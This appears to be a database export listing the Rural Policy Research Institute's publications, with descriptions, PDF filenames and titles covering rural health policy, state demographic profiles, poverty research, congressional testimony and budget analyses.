| NULL | Comments in Reply to Request for Comments Regarding Exchange Related Provision of the ACA, by the RUPRI Rural Health Panel<BR>October 2010 | HealthPanel_ExchangeComments_Oct2010.pdf | 348 | Comments Regarding Exchange Related Provisions of the ACA |
| State Profiles | South Carolina Demographic and Economic Profile, updated October 2006 | SouthCarolina.pdf | 64 | South Carolina |
| NULL | RUPRI Rural Poverty Research Center Working Paper #05-01, March 2005<BR>Mindy Crandall and Bruce Weber | WP0501.pdf | 175 | Trickling Down: Does Local Job Growth Reduce Poverty? |
| NULL | Connecting Underemployment, Poverty and Access to Health Care in the Mississippi Delta<BR>RUPRI Rural Poverty Research Center Working Paper #06-02, February 2006<BR>John J. Green and Albert B. Nylander | WP06-02.pdf | 184 | A Community Based Framework for Understanding Problems and Exploring Alternatives |
| NULL | Presentation by Jocelyn Richgels to the National Advisory committee on Rural Health and Human Services<BR>February 23, 2011 | Richgels_NAC_Feb2011.pdf | 356 | Maternal, Infant, and Early Childhood Home Visitation Programs |
| NULL | Updated State Profile for North Dakota<BR>December 31, 2008 | NorthDakota2.pdf | 229 | North Dakota State Profile Update |
| NULL | Full Report: Commentary from the RUPRI Rural Health Panel regarding "Expanding Health Care Coverage: Proposals to Provide Affordable Coverage to All Americans" from the Senate Finance Committee (May 2009)<BR>June 9, 2009 | HealthPanel_FinanceJune09_Final.pdf | 288 | A Rural Perspective/Commentary Regarding Expanding Health Care Coverage from the Senate Finance Committee |
| NULL | Presented by Keith Mueller to the Kentucky Hospital Association Conference on Critical Access Hospitals<BR>April 19, 2011 | Mueller_KY_April2011.pdf | 369 | Accountable Care Organizations and Critical Access Hospitals |
| NULL | Written Statement for the Record: Testimony by RUPRI Director of Policy Programs Charles W. Fluharty<BR>before the United States House of Representatives, Committee on Agriculture<BR>Subcommittee on Specialty Crops, Rural Development and Foreign Agriculture<BR>July 23, 2008 | Fluharty_Testimony_July08.pdf | 160 | Testimony Before the House Agriculture Committe |
| NULL | Updated State Profile for South Dakota<BR>December 31, 2008 | SouthDakota2.pdf | 231 | South Dakota State Profile Update |
| NULL | Presented by Mark Drabenstott, Director of the RUPRI Center for Regional Competitiveness to the Texas Rural Innovators Forum in Austin, TX.<BR>September 2007 | Drabenstott_Austin.pdf | 143 | New Strategies for Texas Economies |
| NULL | An overiew of the Presidents FY2010 Budget and the implications for Rural America, by RUPRI President and CEO Brian Dabson<BR>May 12, 2009&nbsp; | Budget2010_2.pdf | 278 | A Snapshot of the Presidents Budget FY 2010: What's In It For Rural America |
| NULL | CMS Value Based Purchasing Program and Critical Access Hospitals.&nbsp; Report from the RUPRI Rural Health Panel.<BR>January 2009 | CAH_VBP_Final.pdf | 246 | CMS Value Based Purchasing Program and Critical Access Hospitals - Full Report |
| State Profiles | South Dakota Demographic and Economic Profile, updated June 2006 | SouthDakota.pdf | 65 | South Dakota |
| State Profiles | Virginia Demographic and Economic Profile, updated October 2006 | Virginia.pdf | 70 | Virginia |
| NULL | Presented by Keith Mueller at the National Rural Health Association 34th Annual Rural Health Conference, Austin, TX<BR>May 3-6, 2011 | Mueller_NRHA_May2011.pdf | 367 | Advancing Rural Health Care Delivery in a Reform Framework |
| NULL | Presentation by Keith Mueller at the Annual Meeting of the National Rural Health Association, Savannah, GA<BR>May 20, 2010 | Mueller_NRHA_Medicare_May2010.pdf | 324 | Medicare as an Asset for Rural Community Health |
| NULL | Keynote address by RUPRI President Chuck Fluharty to the Eastern Maine Development Corporation<BR>March 11, 2011 | Fluharty_Maine_March2011.pdf | 359 | Rural Development, Regional Innovation, and Our New Fiscal Realities: A Rural Re-Set |
| NULL | Comments from the RUPRI Rural Health Panel RE: CMS-1345-P, Medicare Program; Medicare Shared Savings Program: Accountable Care Organizations<BR>June 2011 | HealthPanel_CMSComments_June2011.pdf | 371 | Comments to the Centers for Medicare and Medicaid Services |
| NULL | Data Brief by Kathleen Miller, RUPRI Program Director<BR>May 22, 2008 | DataBrief_PCI.pdf | 156 | Data Brief: County Per Capita Income, 2006 |
| NULL | Updated state profile for Montana<BR>October 24, 2008 | Montana2.pdf | 217 | Montana State Profile Update |
| NULL | Paper by Brian Dabson, RUPRI President and CEO<BR>Inter-American Institute for Cooperation on Agriculture (IICA)<BR>International Workshop of Experts, July 8-9, 2008, Costa Rica<BR><EM>Contribution of Agriculture and the Rural Milieu to Sustainable Development and Food Security in the New International Context</EM>. | Dabson_IICA_July08.pdf | 159 | Visions of the Rural Milieu: United States |
| NULL | <UL>
<LI>Using the Tax Code as Social Policy in Rural America</LI>
<LI>Economic Benefits to Mexicans Emigrating beyond U.S. Gateway Communities</LI>
<LI>The Effectiveness of Job Growth in Lowering Poverty in Persistent Poverty Counties</LI>
<LI>New Report Outlines Available Data for Rural Research</LI></UL> | Perspectivesvol3n3.pdf | 202 | Volume 3, Number 3: Fall 2005 |
| NULL | Presented by RUPRI Rural Health Panel Chair Keith Muller to the Rural Health Caucus, U.S. Senate<BR>November 30, 2011 | Mueller_RHC_November2011.pdf | 380 | The Future of Rural Health: Implications for Public Policy |
| State Profiles | Kentucky Demographic and Economic Profile, updated June 2006 | Kentucky.pdf | 41 | Kentucky |
| NULL | Analysis of the&nbsp;FY2010 Budget Proposal<BR>by RUPRI President Brian Dabson<BR>March 3, 2009 | Budget2010.pdf | 268 | The Presidents Budget FY 2010: What's In It For Rural America? |
| Rural Health Panel Documents | RUPRI Rural Health Panel Policy Document P2001-3<BR>January 15, 2001 | p2001-3.pdf | 148 | Rural Implications of the Medicare, Medicaid, and SCHIP Benefits Improvement and Protection Act of 2000 |
| NULL | RUPRI Rural Poverty Research Center Working Paper #06-05, February 2006<BR>Ted K. Bradshaw | WP06-05.pdf | 187 | Theories of Poverty and Anti-Poverty Programs in Community Development |
| NULL | Comments on the FCC National Broadband Plan, by the Benton Foundation, Center for Rural Strategies, Telecommunications and Information Policy Institute at the University of Texas at Austin, and the Rural Policy Research Institute<BR>June 10, 2009 | BroadbandComments_Bentonetal_June09.pdf | 291 | Comments on the National Broadband Plan, Benton Foundation et al |
| NULL | Updated state profile for Connecticut<BR>February 9, 2009 | Connecticut2.pdf | 258 | Connecticut State Profile Update |
| NULL | Written Statement for the Record by Dr. Mark Drabenstott, Director of the RUPRI Center for Regional Competitiveness.<BR>Testimony before the U.S. House of Representatives, Committee on Agriculture, Subcommittee on Conservation, Credit, Energy, and Research.<BR>June 11, 2009
<P></P> | Drabenstott_Testimony_June09.pdf | 297 | Mark Drabenstott Testimony Before House Ag Committee |
| NULL | Presentation by Brian Dabson at the Council on Foundations Rural Philanthropy Conference, <BR>July 25-27, 2011 | Dabson_Philanthropy_July2011.pdf | 377 | Orientation on Economic Regionalism |
| NULL | Presentation by A. Clinton MacKinney at the Rural Health Care Leadership Conference, Phoenix, AZ<BR>January 31, 2011 | MacKinney_Phoenix1_Jan2011.pdf | 351 | The March to Accountable Care ORganizations: How Will Rural Fare? |
| NULL | Rural Considerations Regarding Reauthorization of the Surface Transportation Act<BR>Brian Dabson, Thomas G. Johnson, and Charles W. Fluharty<BR>April 7, 2011 | RUPRI_Transportation_April2011.pdf | 365 | Rethinking Federal Investments in Rural Transportation |
| Telecommunications | Policy Brief from the RUPRI Telecommunications Panel<BR>August 13, 2003 | Schement_Policy_Brief_final.pdf | 135 | Rural America In the Digital Age: Policy Brief |
| NULL | Updated state profile for Minnesota<BR>January 12, 2009 | Minnesota2.pdf | 237 | Minnesota State Profile Update |
| NULL | Updated state profile for Rhode Island<BR>February 13, 2009 | RhodeIsland2.pdf | 264 | Rhode Island State Profile Update |
| NULL | <UL>
<LI>Inequality in Rural Mobile Home Parks: Life on the Wrong Side of the Tracks</LI>
<LI>Effects of Social Networks among Rural Single Mothers on Welfare and Employment</LI>
<LI>The Differing Effects of the Economy and Social Policies on Poverty in Nonmetro and Metro Areas</LI>
<LI>Theories of Poverty and Antipoverty Programs in Community Development</LI></UL> | Perspectivesvol3n4.pdf | 204 | Volume 3, Number 4: Winter 2006 |
| NULL | Presentation by A. Clinton MacKinney at the Rural Health Care Leadership Conference, Phoenix, AZ<BR>January 31, 2011 | MacKinney_Phoenix2_Jan2011.pdf | 352 | The Triumvirate: Board, Administration, and Physicians |
| NULL | Bobby Gierisch, Director of RUPRI State Policy Programs<BR>August 2006 | Coalition of Policy Centers.pdf | 98 | Overview of the Coalition of State Policy Centers |
| NULL | <SPAN style="LINE-HEIGHT: 115%; FONT-FAMILY: 'Calibri', 'sans-serif'; FONT-SIZE: 11pt; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"><FONT face=Calibri>RUPRI President Chuck Fluharty presented House Ag Committee Testimony on February 15 to the RD Subcommittee, regarding rural definitions in Farm Bill programming.<SPAN style="mso-spacerun: yes">&nbsp; </SPAN>Subsequently, he was asked by Ranking Member Costa to submit a formal question response regarding the possibility of RD/CDBG integration, to advance regional rural collaboration, across federal agencies</FONT></SPAN> | Fluharty_SupplementalQuestions_Feb2011.pdf | 358 | Subsequent Member Response from the February 15 House Ag Committee Hearing |
| State Profiles | Utah Demographic and Economic Profile, updated July 2006 | Utah.pdf | 68 | Utah |
| NULL | <FONT size=2 face="Trebuchet ms">Keynote Speech by RUPRI President and CEO Brian Dabson to<BR>The Kentucky Highlands Investment Corporation 40th Anniversary Celebration.<BR>Somerset, Kentucky<BR>August 5, 2008</FONT> | Dabson_KHIC.pdf | 161 | Keynote Speech to the Kentucky Highlands Investment Corporation |
| NULL | From the RUPRI Rural Health Panel<BR>September 16, 2010 | Health_PPACAImpacts_Sept2010.pdf | 329 | The Patient Protection and Affordable Care Act of 2010: Impacts on Rural People, Places, and Providers: A First Look |
| NULL | Seven Considerations for Committee Review<BR>Presented by RUPRI to the Senate Committee on Agriculture, Nutrition and Forestry<BR>October 3, 2007 | RUPRIdocument.pdf | 144 | Why Rural Development Investments are Critical to the Future of America's Farm Families |
| NULL | <UL>
<LI>Beyond Poverty Rates: Why Depth and Severity of Poverty Matter When Comparing Rural and Urban Poverty</LI>
<LI>2003-2004 RUPRI Rural Poverty Research Center Dissertation Fellowships</LI>
<LI>Addressing Person and Place to Alleviate Rural Poverty</LI>
<LI>Welfare Reform in California's Agricultural Counties</LI></UL> | Perspectivesvol1n2.pdf | 194 | Volume 1, Number 2: August 2003 |
| NULL | RUPRI Rural Poverty Research Center Working Paper #05-02, January 2005<BR>Mark D. Partridge and Dan S. Rickman | WP0502.pdf | 176 | Persistent Pockets of Extreme American Poverty: People or Place Based? |
| NULL | Counties in which nonhispanic whites accounted for less than half of total population, 2000. | MinMaj00.pdf | 286 | Minority Majority Counties, 2000 |
| NULL | Executive Order from President Barak Obama Establishing a White House Rural Council<BR>June 9, 2011 | 2011ruralcouncil.pdf | 373 | White House Rural Council Executive Order |
| State Profiles | Rhode Island Demographic and Economic Profile, updated December 2006 | RhodeIsland.pdf | 63 | Rhode Island |
| NULL | A Critical Review of the ORHP Outreach Grantees<BR>RUPRI Rural Human Services Panel<BR>March 2010 | HS_OutreachGrant_March2010.pdf | 315 | Stimulating Local Innovation for Rural Health and Human Services Integration |
| NULL | Second foundation paper for the RUPRI Rural Futures Lab, November 2010 | Regional_Collaboration_Final.pdf | 345 | Perspectives on Regional Collaboration |
| NULL | Presentation to <EM>Cultivating Hope, Harvesting Action</EM>: The 6th Regional Conference on Rural Poverty and Social Change, The University of Massachusetts, Amherst, by Charles W. Fluharty, RUPRI President.<BR>June 2006 | 060206.pdf | 87 | A New Rural Vision: Policy as though Rural Communities and People Mattered |
| NULL | RUPRI Rural Health Panel. Prinicpal authors A. Clinton MacKinney, Keith J. Mueller, and Nicholas P. Lillios.
April 2012 | HealthPanel_VBP_April2012.pdf | 387 | Anticipating the Rural Impact of Medicare Value Based Purchasing |
| NULL | Michigan Demographic and Economic Profile, updated September 2006 | MichiganProfile.pdf | 46 | Michigan |
| NULL | Presentation by RUPRI Rural Health Panel Member Andrew Coburn to the New England Rural Health Roundtable, <BR>October 28, 2010 | Coburn_ACA_Oct2010.pdf | 341 | Rural Implications of the Patient Protection and Affordable Care Act of 2010 |
| NULL | Updated state profile for Kentucky<BR>November 11, 2008 | Kentucky2.pdf | 223 | Kentucky State Profile Update |
| NULL | Updated state profile for Colorado<BR>February 9, 2009 | Colorado2.pdf | 257 | Colorado State Profile Update |
| NULL | RUPRI Rural Health Panel<BR>March 4, 2011 | HealthPanel_VBPComments_March2011.pdf | 360 | Comments on the Proposed Rule for the Medicare Program; Hospital Inpatient Value Based Purchasing Program |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-06, August 2004<BR>Hema Swaminathan and Jill L. Findeis | WP0406.pdf | 171 | Policy Intervention and Poverty in Rural America |
| NULL | RUPRI Rural Poverty Research Center Working Paper #06-04, February 2006<BR>Sally Ward and Heather Turner | WP06-04.pdf | 186 | Work and Welfare Strategies Among Single Mothers in Rural New England: The ROle of Social Networks and Social Support |
| NULL | Written Statement for the Record, Charles W. Fluharty, RUPRI President and CEO, Testimony before the U.S. Senate Committee on Agriculture, Nutrition, and Forestry<BR>February 15, 2012 | Fluharty_Testimony_Feb152012.pdf | 381 | Charles Fluharty Written Testimony, Senate Ag Committee, Feb 15, 2012 |
| NULL | Report prepared for the National Governors Association<BR>May 13, 2008<BR>Kathleen Miller, RUPRI Program Director | RUPRI_NGA.pdf | 151 | Nonmetro America: Conditions & Trends |
| NULL | Presentation by RUPRI President Charles W. Fluharty to the Texas Rural Innovators Forum<BR>Bastrop, TX<BR>March 20, 2007 | Texas032007.pdf | 131 | Rural Policy as Though Rural People and Places Mattered: A Bridging Model Across the Rural Policy / Practice Chasm |
| NULL | News Release, April 5, 2010 | Press_Release_Drabenstott_April2010.pdf | 312 | Senior RUPRI Leader Named Secretary General of Global Organization |
| NULL | Updated state profile for Georgia<BR>January 12, 2009 | Georgia2.pdf | 234 | Georgia State Profile Update |
| NULL | Updated State Profile for Michigan<BR>January 12, 2009 | Michigan2.pdf | 239 | Michigan State Profile Update |
| Rural Health Panel Documents | Report from the RUPRI Rural Health Panel<BR>August 2000 | p2000-13.pdf | 117 | Redesigning the Medicare Program: An Opportunity to Improve Rural Health Care Systems? |
| Rural Health Panel Documents | Policy Paper from the RUPRI Rural Health Panel<BR>February 2006 | P2006-1.pdf | 129 | The Institue of Medicine Rural Health Report: Next Steps in Legislation and Programs |
| Rural Health Panel Documents | Report by the RUPRI Rural Health Panel<BR>September 2001 | MedPACcomments.pdf | 111 | Comments on the June 2001 Report of the Medicare Payment Advisory Commission: Medicare in Rural America |
| NULL | Report from the RUPRI Rural Health Panel, funded by the Robert Wood Johnson Foundation.<BR>October 30, 2009 | Health_ReformBrief_Oct09.pdf | 301 | Assuring Health Coverage for Rural People Through Health Reform: Full Report |
| State Profiles | Wyoming Demographic and Economic Profile, updated October 2006 | Wyoming.pdf | 74 | Wyoming |
| NULL | Kathleen K. Miller, Program Director and Charles W. Fluharty, Vice President for Policy Programs<BR>November 24, 2008 | ElectionPolicyBrief.pdf | 227 | 2008 Presidential Election Results for Nonmetropolitan Counties: Electoral Shifts and Trends |
| State Profiles | Maine Demographic and Economic Profile, updated May 2006 | Maine.pdf | 43 | Maine |
| State Profiles | Oregon Demographic and Economic Profile, updated May 2006 | Oregon.pdf | 61 | Oregon |
| NULL | Updated report: Rural Coverage Under the Patient Protection and Affordable Care Act As Amended<BR>Tim McBride, RUPRI Rural Health Panel<BR>December 22, 2009 | McBride_Insurance_Amended_Dec09.pdf | 306 | Rural Coverage Under the Patient Protection and Affordable Care Act As Amended |
| NULL | Updated State Profile for Texas<BR>October 10, 2008 | Texas2.pdf | 209 | Texas State Profile Update |
| NULL | Profiles of Rural Centers in the South.&nbsp; Prepared by Bobby Gierisch, Director of RUPRI State Policy Programs for the Southern Legislative Conference<BR>July 2006 | SLC Profiles Final.pdf | 96 | Rural Centers in the South |
| NULL | Summary of the FY2011 Budget, and the implications for rural America, by RUPRI President and CEO Brian Dabson<BR>February 9, 2010 | Dabson_FY11Budget.pdf | 307 | The President's Budget FY 2011: What's in it for Rural America? |
| NULL | Updated state profile for Florida<BR>February 13, 2009 | Florida2.pdf | 261 | Florida State Profile Update |
| NULL | New document from the RUPRI Rural Health Panel<BR>October 2008 | RUPRI_VBPResponse.pdf | 214 | RUPRI Health Panel Response to CMS' Report to Congress: Plan to Implement a Medicare Hospital Value-Based Purchasing Program |
| NULL | <UL>
<LI>The State of Human Services in Rural America</LI>
<LI>Access to Social Services in Rural America</LI>
<LI>Rural Communities: Good for Studying Neighborhood Effects and Social Mobility</LI></UL> | PerspectivesWinter09.pdf | 269 | Perspectives Newsletter Volume 5, Winter 2008-09 |
| NULL | Comments on the FCC National Broadband Plan, by the Rural Internet and Broadband Policy Group<BR>June 10, 2009 | BroadbandComments_PolicyGroup_June09.pdf | 292 | Comments on the National Broadband Plan, Rural Internet and Broadband Policy Group |
| Rural Health Panel Documents | Policy Brief from the RUPRI Rural Health Panel<BR>June 2000 | PB2000-1.pdf | 118 | Report on Enrollment: Rural Medicare Beneficiaries in Medicare+Choice Plans |
| NULL | RUPRI Farm Bill Policy Brief #2.<BR>Wayne Myers, MD, 2006-07 RUPRI Policy Fellow | FarmBillbrief2-Myers.pdf | 79 | What Does Finland Have that We Don't? |
| State Profiles | Missouri Demographic and Economic Profile, updated April 2006 | Missouri.pdf | 49 | Missouri |
| NULL | RUPRI Rural Poverty Research Center Working Paper #06-06, February 2006<BR>Tim Slack | WP06-06.pdf | 188 | Work, Welfare, and the Informal Economy: An Examination of Family Livelihood Strategies in Rural Pennsylvania |
| NULL | Updated State Profile for New Hampshire<BR>February 3, 2009 | NewHampshire2.pdf | 252 | New Hampshire State Profile Update |
| State Profiles | New York Demographic and Economic Profile, updated July 2006 | NewYork.pdf | 56 | New York |
| NULL | RUPRI Rural Poverty Research Center Working Paper #05-03, May 2005<BR>Jennifer Sherman | WP0503.pdf | 177 | Men Without Sawmills: Masculinity, Rural Poverty, and Family Stability |
| NULL | Counties in which nonhispanic whites accounted for less than half of total population, 2008. | MinMaj08.pdf | 287 | Minority Majority Counties, 2008 |
| NULL | Updated state profile for Mississippi<BR>October 24, 2008 | Mississippi2.pdf | 216 | Mississippi State Profile Update |
| Rural Health Panel Documents | Policy Paper from the RUPRI Rural Health Panel<BR>January 2003 | p2003-1.pdf | 127 | An Assessment of Proposals for a Medicare Outpatient Prescription Drug Benefit: The Rural Perspective |
| NULL | Updated State Profile for Missouri<BR>October 10, 2008 | Missouri2.pdf | 210 | Missouri State Profile Update |
| NULL | Comments Regarding Proposed Statement of Antitrust Enforcement Policy Regarding Accountable Care Organizations Participating in the Medicare Shared Savings Program; FTC Matter NO: V100017 | HealthPanel_ACOComments_May2011.pdf | 370 | Comments from the Rural Health Panel to the Federal Trade Commission |
| State Profiles | Colorado Demographic and Economic Profile, updated December 2006 | Colorado.pdf | 30 | Colorado |
| NULL | Updated State Profile for Arkansas<BR>February 3, 2009 | Arkansas2.pdf | 249 | Arkansas State Profile Update |
| State Profiles | Arkansas Demographic and Economic Profile, updated August 2006 | Arkansas.pdf | 27 | Arkansas |
| NULL | Keynote speech by Charles W. Fluharty to the OECD Symposium on Regional Policy: <EM>Innovation and Green Growth: The Regional Dimension</EM>.<BR>December 2, 2009<BR>OECD Conference Centre, Paris, France. | Fluharty_OECD_Dec09.pdf | 304 | The Impact of the Crisis on Regional Actors and on the Governance of Regional Policy |
| NULL | Terry B. Reilly Memorial Lecture Keynote Address by RUPRI President Chuck Fluharty to the National Rural Health Association Annual Conference in Savannah, GA<BR>May 20, 2010. | Fluharty_NRHA_May2010.pdf | 326 | The Role of Community in the Great Rural Renaissance: Addressing the Difficult Questions |
| NULL | Updated state profile for Idaho<BR>November 11, 2008 | Idaho2.pdf | 222 | Idaho State Profile Update |
| NULL | Presentation by Keith Mueller to the National Advisory Committee on Rural Health and Human Services<BR>February 23, 2011 | Mueller_NAC_Feb2011.pdf | 355 | Health Insurance Exchanges: Implementation in Rural Places |
| NULL | Updated State Profile for Virginia<BR>February 9, 2009 | Virginia2.pdf | 254 | Virginia State Profile Update |
| NULL | Updated state profile for New Mexico<BR>November 11, 2008 | NewMexico2.pdf | 225 | New Mexico State Profile Update |
| NULL | Connecting Knowledge, Analysis, and Decision Making.&nbsp; Presented by Charles Fluharty at the Policy Research Initiative of the Canadian Government Workshop, Ottawa.<BR>February 22, 2010 | Fluharty_Ottawa_Feb2010.pdf | 311 | Bringing Place-Based Tools to Policy Development in the Federal Government |
| Poverty and Welfare Reform | RUPRI Data Report<BR>Kathleen Miller, RUPRI Program Director and Thomas Rowley, RUPRI Fellow<BR>July 2002 | p2002-5.pdf | 128 | Rural Poverty and Rural-Urban Income Gaps: A Troubling Snapshot of the |
| NULL | Updated state profile for Ohio<BR>October 24, 2008 | Ohio2.pdf | 221 | Ohio State Profile Update |
| NULL | Updated State Profile for West Virginia<BR>January 26, 2009 | WestVirginia2.pdf | 244 | West Virginia State Profile Update |
| NULL | Charles W. Fluharty, RUPRI Director<BR>Written Statement for the Record.<BR>March 30, 2006. | testimony.pdf | 124 | Testimony before the Committee on Agriculture, U.S. House of Representatives |
| NULL | Updated state profile for Kansas<BR>January 12, 2009 | Kansas2.pdf | 235 | Kansas State Profile Update |
| NULL | Presentation by RUPRI Center for Rural Entrepreneurship Managing Director Deborah Markley to the Tri-State Summit, Fairfield, Iowa.<BR>October 12, 2009 | Markley_TriState_October09.pdf | 300 | Energizing Entrepreneurs in the Tri-State Region: Taking Action in Your Community |
| State Profiles | Nebraska Demographic and Economic Profile, updated May 2006 | Nebraska.pdf | 51 | Nebraska |
| NULL | Updated state profile for Louisiana<BR>January 12, 2009 | Louisiana2.pdf | 236 | Louisiana State Profile Update |
| State Profiles | New Mexico Demographic and Economic Profile, updated June 2006 | NewMexico.pdf | 55 | New Mexico |
| Telecommunications | Policy Brief by Sharon Strover, Chair of the RUPRI Telecommunications Panel<BR>July 11, 2001 | PB2001-12.pdf | 137 | Rural Implications of H.R. 1542: The Internet Freedom and Broadband Deployment Act of 2001 |
| NULL | A Promising Model for Rural Human Services Integration and Transformation<BR>February 2012 | HS_Humboldt_Feb2012.pdf | 385 | Humboldt County, California |
| NULL | Updated State Profile for Arizona<BR>February 3, 2009 | Arizona2.pdf | 248 | Arizona State Profile Update |
| NULL | Presentation by RUPRI President Charles W. Fluharty at the NADO 2007 Washington Policy Conference<BR>Washington, D.C.<BR>March 13, 2007 | NADO031307.pdf | 132 | Rural Development Opportunities in the Next Farm Bill: Aligning Rural Initiatives and Ag Policies in a Regional Rural Innovation System |
| State Profiles | New Jersey Demographic and Economic Profile, updated December 2006 | NewJersey.pdf | 54 | New Jersey |
| NULL | Percent change in income in nonmetropolitan counties 2006 to 2007 (adjusted for inflation).<BR>May 13, 2009 | PCIch0607.pdf | 280 | Map: Percent Change in Per Capita Income in Nonmetropolitan Counties 2006-2007 |
| NULL | Counties with a median age of 50 or higher, by CBSA status.<BR>May 20, 2009 | medage08.pdf | 282 | Map: Counties with Median Age of 50 or Older |
| NULL | Presented by Keith Mueller to the Northwest Regional Critical Access Hospital Conference<BR>March 13, 2012 | Mueller_ACO_March2012.pdf | 384 | Accountable Care Organizations: A Viable Model for CAH Participation? |
| NULL | Stimulus overview | nado stimfinal.pdf | 267 | stimulus |
| NULL | Presented by Kathy Miller at the Community Issues Management Collaborative Meeting in Detoit, MI.<BR>October 14, 2010 | Miller_CIM_Detroit_October2010.pdf | 337 | Overview of the Decennial Census and the American Community Survey |
| NULL | Written statement for the record.<BR>Dr. Deborah M. Markley, Managing Director and Director of Research, RUPRI Center for Rural Entrepreneurship<BR>Testimony before the U.S. House of Representatives<BR>Committe on Agriculture<BR>Subcommittee on Rural Development, Biotechnology, Specialty Crops, and Foreign Agriculture<BR>March 31, 2009 | Markley_Testimony_March09.pdf | 271 | House Rural Development Hearing March 31, 2009 |
| State Profiles | Vermont Demographic and Economic Profile, updated November 2006 | Vermont.pdf | 69 | Vermont |
| State Profiles | North Carolina Demographic and Economic Profile, updated&nbsp;June 2006 | NorthCarolina.pdf | 57 | North Carolina |
| NULL | RUPRI Rural Poverty Research Center Working Paper #05-04, May 2005<BR>Monica Fisher | WP0504.pdf | 178 | Why is U.S. Poverty HIgher in Nonmetropolitan than Metropolitan Areas? Evidence from the Panel Study of Income Dynamics |
| State Profiles | Minnesota Demographic and Economic Profile, updated July 2006 | Minnesota.pdf | 47 | Minnesota |
| Poverty and Welfare Reform | Policy Breif from the RUPRI Rural Welfare Policy Panel<BR>February 10, 1999 | p99-3.PDF | 139 | Rural America and Welfare Reform: An Overview Assessment |
| Rural Health Panel Documents | Issue Brief from the RUPRI Rural Health Panel<BR>October 2007 | HealthPanelBrief3.pdf | 149 | Medicare Advantage Plans in Rural America |
| NULL | Comparative Rural Policy Book, Table of Contents | Comparative_Rural_Policy_Book.pdf | 386 | Comparative Rural Policy Book |
| State Profiles | Maryland Demographic and Economic Profile, updated December 2006 | Maryland.pdf | 44 | Maryland |
| NULL | Presented by RUPRI President Chuck Fluharty to the Geographical Sciences Committee, National Academy of Sciences, Washington, DC<BR>February 10, 2011 | Fluharty_NAS_Feb2011.pdf | 353 | Progress and Challenges in Place-Based Rural Policies |
| NULL | Updated state profile for Oklahoma<BR>January 12, 2009 | Oklahoma2.pdf | 240 | Oklahoma State Profile Update |
| NULL | Updated State Profile for Alaska<BR>January 26, 2009 | Alaska2.pdf | 245 | Alaska State Profile Update |
| NULL | Updated State Profile for New York<BR>January 26, 2009 | NewYork2.pdf | 241 | New York State Profile Update |
| NULL | <P style="MARGIN: 0in 0in 0pt" class=MsoNormal><SPAN style="COLOR: black"><FONT face=Calibri>International Comparative Rural Policy Studies (ICRPS) <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p></FONT></SPAN></P><SPAN style="FONT-FAMILY: 'Calibri', 'sans-serif'; COLOR: black; FONT-SIZE: 11pt; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA">2004-2011 Summer Institute Participants Survey Report<BR>March 2012</SPAN> | ICRPS_SurveyReport_022812.pdf | 383 | ICRPS 2004-2011 Survey Report |
| State Profiles | Connecticut Demographic and Economic Profile, updated December 2006 | Connecticut.pdf | 31 | Connecticut |
| State Profiles | Indiana Demographic and Economic Profile, updated May 2006 | Indiana.pdf | 38 | Indiana |
| NULL | Internal Working Paper<BR>Kathleen Miller, RUPRI Program Director<BR>July 2006<BR> | WP1.pdf | 100 | Micropolitan Areas Overview |
| NULL | Updated state profile for Massachusetts<BR>November 11, 2008 | Massachusetts2.pdf | 224 | Massachusetts State Profile Update |
| NULL | Presentation by Keith Mueller at the Annual Meeting of the National Rural Health Association, Savannah, GA<BR>May 20, 2010 | Mueller_NRHA_Reform_May2010.pdf | 325 | Health Reform: One Rural Community at a Time |
| Telecommunications | A Preliminary Assessment of the State of the Information / Telecommunications Infrastructure in Ten Counties of North Dakota and Pennsylvania<BR>Jorge Reina Schement and Marsha Ann Tate<BR>August 13, 2003 | Schement_RUPRI_paper03.pdf | 136 | Rural America in the Digital Age: Report |
| NULL | Brief by Colleen Heflin and Kathleen Miller<BR>June 2011 | HeflinMiller_GeogNeed_June2011.pdf | 376 | The Geography of Need: Identifying Human Service Needs in Rural America |
| NULL | Presentation by Brian Dabson to the Montana Economic Development Summit, Butte, Montana.<BR>September 13, 2010 | Dabson_ButteMT_Sept2010.pdf | 340 | Entrepreneurship: The Future of Montana's Rural Communities |
| NULL | Chapter by Brian Dabson in&nbsp; <EM>Looking Forward</EM>, the 10th anniversary publication for the Funders Network for Smart Growth and Livable Communities.<BR>April, 2009 | Dabson_LookingForward.pdf | 275 | Regionalism, Assets, and Entrepreneurship: The Future of Rural Economies |
| NULL | Updated state profile for Illinois<BR>January 12, 2009 | Illinois2.pdf | 238 | Illinois State Profile Update |
| State Profiles | Wisconsin Demographic and Economic Profile, updated June 2006 | Wisconsin.pdf | 73 | Wisconsin |
| State Profiles | West Virginia Demographic and Economic Profile, updated June 2006 | WestVirginia.pdf | 72 | West Virginia |
| Rural Health Panel Documents | Policy Brief from the RUPRI Rural Health Panel<BR>March 2001 | pb2001-7.pdf | 125 | Update on Medicare+ Choice: Rural Medicare Beneficiaries Enrolled in Medicare+ Choice Plans througth October 2000 |
| Rural Health Panel Documents | Report from the RUPRI Rural Health Panel<BR>May 2000 | p2000-4.pdf | 119 | Rural Assessment of Leading Proposals to Redesign the Medicare Program |
| State Profiles | Montana Demographic and Economic Profile, updated May 2006 | Montana.pdf | 50 | Montana |
| NULL | Presentation to the OECD/Scottish Executive Conference: <EM>Investment Priorities for Rural Development</EM> by Charles W. Fluharty, RUPRI President.<BR>October 2006 | OECD_101806.pdf | 81 | Crafting a Way Forward: The Rural/Urban Dynamic in Regional Competitiveness |
| NULL | Counties with 20% or more of population age 65 of higher, by CBSA status.<BR>May 20, 2009 | 20pcage65over08.pdf | 281 | Map: Counties in which 20% or more of the Population is Age 65 or Older |
| Rural Health Panel Documents | Report from the RUPRI Rural Health Panel<BR>August 2007 | Health_Panel_Aug07.pdf | 141 | Bridging Rural Health Research and Policy: Dissemination Strategies |
| NULL | Joint Policy Paper from the RUPRI Health and Human Services Panels<BR>March 2011 | HHSPanels_Integration_March2011.pdf | 363 | Place-based Policies and Public health: the Road to Healthy Rural People and Places |
